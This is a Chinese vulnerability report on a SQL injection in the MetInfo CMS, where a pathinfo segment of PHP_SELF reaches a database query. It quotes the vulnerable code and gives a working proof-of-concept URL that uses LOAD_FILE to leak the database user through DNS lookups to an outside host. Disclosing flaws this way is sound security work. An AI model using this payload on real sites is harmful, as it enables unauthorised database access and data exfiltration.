MetInfo 注入

  1. 发布时间:2016-11-25
  2. 公开时间:N/A
  3. 漏洞类型:sql注入
  4. 危害等级:高
  5. 漏洞编号:xianzhi-2016-11-61726270
  6. 测试版本:N/A

漏洞详情

app/system/include/compatible/metv5_top.php 行27

$PHP_SELF = $_SERVER['PHP_SELF'] ? $_SERVER['PHP_SELF'] : $_SERVER['SCRIPT_NAME'];
$PHP_SELFs = explode('/', $PHP_SELF);
$query = "SELECT * FROM {$_M['table'][column]} where module!=0 and foldername = '{$PHP_SELFs[count($PHP_SELFs)-2]}' and lang='{$_M['lang']}'";
$column = DB::get_one($query);

$_SERVER['PHP_SELF']跟$_SERVER['SCRIPT_NAME']不同 前者包括pathinfo
比如
/index.php/something/else
$_SERVER['SCRIPT_NAME']就是index.php
而$_SERVER['PHP_SELF']是/index.php/something/else
这里explode之后进入了sql语句 造成注入 找一个包含的地方就可以了

测试方法:

由于metinfo默认没显错 这里注入点也没输出 所以用延时或者类似cloudeye.me的方法来做
需要适当编码

http://192.168.1.170/metinfo/member/login.php/x'%20and%20if((SELECT%20LOAD_FILE(CONCAT(0x5c5c5c5c,(SELECT%20hex(user())),0x2e6c756461732e70772f2f666f6f626172))),1,1)%23%23/a

wireshark抓个包证明下吧


view.png

0x726f6f74406c6f63616c686f7374=root@localhost

©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容

  • Getting Started Use the Current Stable Version (7.1) Buil...
    Leonzai阅读 1,972评论 0 3
  • php面试题及答案(转载)收藏 基础题: 1.表单中 get与post提交方法的区别? 答:get是发送请求HTT...
    积_渐阅读 1,686评论 0 37
  • Spring Cloud为开发人员提供了快速构建分布式系统中一些常见模式的工具(例如配置管理,服务发现,断路器,智...
    卡卡罗2017阅读 134,886评论 18 139
  • 读美国著名心理学家、教育家海姆G 吉诺特博士的教育经典之作《老师怎样和学生说话》,越读,越是歉疚;越读,越多反思,...
    香蕉与芒果阅读 630评论 0 3
  • 虎峰山—春暖花开! 重慶璧山虎莑山素有"重鏖小九寨"的美誉,初春时节,漫山桃花、梨花竞相绽放、相映成趣,是踏...
    楓哥_b3cf阅读 655评论 1 2